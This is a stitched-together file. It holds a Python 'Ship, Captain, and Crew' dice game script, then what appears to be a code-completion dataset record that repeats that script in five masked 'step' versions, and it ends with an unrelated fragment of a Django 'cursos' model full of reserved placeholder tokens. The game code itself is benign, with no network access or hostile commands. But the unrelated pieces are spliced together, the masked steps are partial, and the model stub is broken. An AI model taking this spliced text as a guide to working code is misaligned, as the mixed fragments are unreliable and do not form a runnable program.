                    total_scc_one = roll1_scc_one + int(inp_scc_one)
                    inp_scc_one2 = input("Hit enter to roll again or type 'pass' to keep your score ")
                    if inp_scc_one2 == "pass":
                        print("Your total score is: " + str(total_scc_one) + ".")
                    if inp_scc_one2 == "":
                        roll1_scc_one2 = random.randint(1, 6)
                        print(roll1_scc_one2)
                        total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
                        print("Your total score is: " + str(total_scc_one2) + ".")
            # Branch 2: ship and captain found, still missing the crew (a 4).
            if set(sc).issubset(roll5):
                inp_sc = input("Now you need a 4(the Crew). Hit enter to roll the remaining dice")
                if inp_sc == "":
                    roll3 = random.choices(range(1, 7), k=3)
                    print(roll3)
                    if set(crew).issubset(roll3):
                        result_crew = [i for i in roll3 if not i in crew or crew.remove(i)]
                        total_crew = sum(result_crew)
                        inp_crew = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                        if inp_crew == "both":
                            print("Total score: " + str(total_crew) + ".")
                        if inp_crew == "neither":
                            roll2_crew = random.choices(range(1, 7), k=2)
                            print(roll2_crew)
                            total_crew_none = sum(roll2_crew)
                            print("Your total score is: " + str(total_crew_none) + ".")
                        if inp_crew == "one":
                            inp_crew_one = input("Which die do you want to keep? ")
                            roll1_crew_one = random.randint(1, 6)
                            print(roll1_crew_one)
                            total_crew_one = roll1_crew_one + int(inp_crew_one)
                            print("Your total score is: " + str(total_crew_one) + ".")
                    else:
                        # Last chance to roll the missing 4.
                        inp_sc3 = input("Still no 4. Hit enter to roll again")
                        if inp_sc3 == "":
                            roll3_sc3 = random.choices(range(1, 7), k=3)
                            print(roll3_sc3)
                            if set(crew).issubset(roll3_sc3):
                                result_crew_sc3 = [i for i in roll3_sc3 if not i in crew or crew.remove(i)]
                                total_crew_sc3 = sum(result_crew_sc3)
                                print("Your total score is: " + str(total_crew_sc3) + ".")
                            else:
                                print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
            # Branch 3: only the ship (a 6), no captain yet; the `n < 2`
            # guard leaves room for the extra rolls this path needs.
            if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
                inp_ship = input(
                    "Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice ")
                if inp_ship == "":
                    roll4_ship = random.choices(range(1, 7), k=4)
                    print(roll4_ship)
                    if set(cc).issubset(roll4_ship):
                        result_ship_cc = [i for i in roll4_ship if not i in cc or cc.remove(i)]
                        total_ship_cc = sum(result_ship_cc)
                        inp_ship_cc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                        if inp_ship_cc == "both":
                            print("Your total is: " + str(total_ship_cc) + ".")
                        if inp_ship_cc == "neither":
                            roll2_cc = random.choices(range(1, 7), k=2)
                            print(roll2_cc)
                            total_ship_cc_none = sum(roll2_cc)
                            print("Your total score is: " + str(total_ship_cc_none) + ".")
                        if inp_ship_cc == "one":
                            inp_ship_cc_one = input("Which die do you want to keep? ")
                            roll1_ship_cc_one = random.randint(1, 6)
                            print(roll1_ship_cc_one)
                            total_ship_cc_one = roll1_ship_cc_one + int(inp_ship_cc_one)
                            print("Your total score is: " + str(total_ship_cc_one) + ".")
                    # Captain found but not the crew: one more roll for the 4.
                    if set(captain).issubset(roll4_ship):
                        roll3_captain = random.choices(range(1, 7), k=3)
                        print(roll3_captain)
                        if set(crew).issubset(roll3_captain):
                            result_ship_captain = [i for i in roll3_captain if not i in crew or crew.remove(i)]
                            total_ship_captain = sum(result_ship_captain)
                            print("Your total score is: " + str(total_ship_captain) + ".")
                        else:
                            print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
        else:
            # Any non-empty input counts as a refused roll.
            n = n + 1
# --- Script entry point -------------------------------------------------
# Ask how many people are playing, then run one interactive round of
# Ship, Captain, and Crew for each of them.
inp = input("How many players are there? ")
players = range(int(inp))
# NOTE(review): roll_dict is assigned but never read in sight — presumably
# a placeholder for per-player score tracking; confirm before removing.
roll_dict = {}
for _player in players:
    multi()
|
flexible
|
{
"blob_id": "bb540ba4cd96e2485e77ba099f0a1a9ea03e1120",
"index": 8144,
"step-1": "<mask token>\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? 
')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. 
Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? 
')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? 
')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. 
Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? 
')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\n<mask token>\nfor i in players:\n multi()\n",
"step-3": "<mask token>\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? 
')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. 
Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? 
')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\ninp = input('How many players are there? ')\nplayers = range(int(inp))\nroll_dict = dict()\nfor i in players:\n multi()\n",
"step-4": "import random\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? 
')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. 
Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? 
')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\ninp = input('How many players are there? ')\nplayers = range(int(inp))\nroll_dict = dict()\nfor i in players:\n multi()\n",
"step-5": "import random\ndef multi():\n\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input(\"Hit enter to roll\")\n if inp == \"\":\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)]\n total_scc = sum(result_scc)\n inp_scc = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_scc == \"both\":\n print(\"Total score: \" + str(total_scc) + \".\")\n if inp_scc == \"neither\":\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_scc_none == \"both\":\n total_scc_none = sum(roll2_scc)\n print(\"Total score: \" + str(total_scc_none) + \".\")\n if inp_scc_none == \"neither\":\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print(\"Your total score is: \" + str(total_scc_none2) + \".\")\n if inp_scc_none == \"one\":\n inp_scc_none_one = input(\"Which die do you want to keep? \")\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(inp_scc_none_one)\n print(roll1_scc_none_one)\n print(\"Your total score is: \" + str(total_scc_none_one) + \".\")\n if inp_scc == \"one\":\n inp_scc_one = input(\"Which die do you want to keep? 
\")\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\"Hit enter to roll again or type 'pass' to keep your score \")\n if inp_scc_one2 == \"pass\":\n print(\"Your total score is: \" + str(total_scc_one) + \".\")\n if inp_scc_one2 == \"\":\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print(\"Your total score is: \" + str(total_scc_one2) + \".\")\n if set(sc).issubset(roll5):\n inp_sc = input(\"Now you need a 4(the Crew). Hit enter to roll the remaining dice\")\n if inp_sc == \"\":\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_crew == \"both\":\n print(\"Total score: \" + str(total_crew) + \".\")\n if inp_crew == \"neither\":\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print(\"Your total score is: \" + str(total_crew_none) + \".\")\n if inp_crew == \"one\":\n inp_crew_one = input(\"Which die do you want to keep? \")\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print(\"Your total score is: \" + str(total_crew_one) + \".\")\n else:\n inp_sc3 = input(\"Still no 4. 
Hit enter to roll again\")\n if inp_sc3 == \"\":\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print(\"Your total score is: \" + str(total_crew_sc3) + \".\")\n else:\n print(\"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\")\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n \"Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice \")\n if inp_ship == \"\":\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_ship_cc == \"both\":\n print(\"Your total is: \" + str(total_ship_cc) + \".\")\n if inp_ship_cc == \"neither\":\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print(\"Your total score is: \" + str(total_ship_cc_none) + \".\")\n if inp_ship_cc == \"one\":\n inp_ship_cc_one = input(\"Which die do you want to keep? 
\")\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(inp_ship_cc_one)\n print(\"Your total score is: \" + str(total_ship_cc_one) + \".\")\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print(\"Your total score is: \" + str(total_ship_captain) + \".\")\n else:\n print(\"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\")\n else:\n n = n + 1\n\n\ninp = input(\"How many players are there? \")\nplayers = range(int(inp))\nroll_dict = dict()\nfor i in players:\n multi()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class cursos(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
